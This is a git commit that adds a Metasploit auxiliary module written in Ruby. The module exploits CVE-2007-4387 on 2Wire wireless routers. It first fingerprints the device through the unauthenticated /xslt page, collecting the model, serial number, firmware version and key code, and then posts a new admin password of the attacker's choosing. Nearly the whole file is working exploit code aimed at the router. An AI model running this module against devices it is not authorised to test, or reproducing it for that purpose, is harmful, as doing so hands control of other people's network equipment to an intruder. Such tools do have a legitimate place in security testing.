Added 2Wire Password Reset module by Travis

git-svn-id: file:///home/svn/framework3/trunk@13121 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-07 20:48:53 +00:00 · 2011-07-07 20:48:53 +00:00 · a795dc7552
parent 84dee0f06c
commit a795dc7552
1 changed files with 145 additions and 0 deletions
--- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb
+++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb
@ -0,0 +1,145 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
+			'Description'    => %q{
+					This module will reset the admin password on a 2Wire wireless router.  This is
+				done by using the /xslt page where authentication is not required, thus allowing
+				configuration changes (such as resetting the password) as administrators.
+			},
+			'License'        => MSF_LICENSE,
+			'Version'        => "$Revision$",
+			'Author'         =>
+				[
+					'hkm',              #Initial discovery, poc
+					'Travis Phillips',  #Msf module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2007-4387' ],
+					[ 'OSVDB', '37667' ],
+					[ 'BID', '36075' ],
+					[ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
+				],
+			'DisclosureDate' => "Aug 15 2007" ))
+
+			register_options(
+				[
+					Opt::RPORT(80),
+					OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
+				], self.class)
+	end
+
+	def run
+
+		print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
+		res = send_request_raw(
+		{
+			'method'  => 'GET',
+			'uri'     => '/xslt?PAGE=A07',
+		}, 25)
+
+		#check to see if we get HTTP OK
+		if (res.code == 200)
+			print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
+		else
+			print_error("Did not get HTTP 200, URL was not found. Exiting!")
+			return
+		end
+
+		#Check to verify server reported is a 2wire router
+		if (res.headers['Server'].match(/2wire Gateway/i))
+			print_status("Server is a 2wire Gateway! Grabing info\n")
+		else
+			print_error("Target doesn't seem to be a 2wire router. Exiting!")
+			return
+		end
+
+		print_status("---===[ Router Information ]===---")
+
+		# Grabbing the Model Number
+		if res.body.match(/<td class="textmono">(.*)<\/td>/i)
+			model = $1
+			print_status("Model: #{model}")
+		end
+
+		# Grabbing the serial Number
+		if res.body.match(/<td class="data">(\d{12})<\/td>/i)
+			serial = $1
+			print_status("Serial: #{serial}")
+		end
+
+		# Grabbing the Hardware Version
+		if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
+			hardware = $1
+			print_status("Hardware Version: #{hardware}")
+		end
+
+		#Check the Software Version
+		if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
+			ver = $1
+			print_status("Software version: #{ver}")
+		else
+			print_error("Target is not a version 5 router. Exiting!")
+			return
+		end
+
+		# Grabbing the Key Code
+		if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
+			key = $1
+			print_status("Key Code: #{key}\n")
+		end
+
+		print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
+		print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
+
+		res = send_request_raw(
+		{
+			'method'  => 'GET',
+			'uri'     => '/xslt?PAGE=H04',
+		}, 25)
+
+		if ( res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
+			print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
+
+			data  = 'PAGE=H04_POST'
+			data << '&THISPAGE=H04'
+			data << '&NEXTPAGE=A01'
+			data << '&PASSWORD=' + datastore['PASSWORD']
+			data << '&PASSWORD_CONF=' + datastore['PASSWORD']
+			data << '&HINT='
+
+			res = send_request_cgi(
+			{
+				'method'  => 'POST',
+				'uri'     => '/xslt',
+				'data'    => data,
+			}, 25)
+
+			if res.code == 200
+				if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
+					cookie= $1
+					print_status("Got cookie #{cookie}. Password reset was successful!\n")
+				end
+			end
+		end
+
+	end
+
+end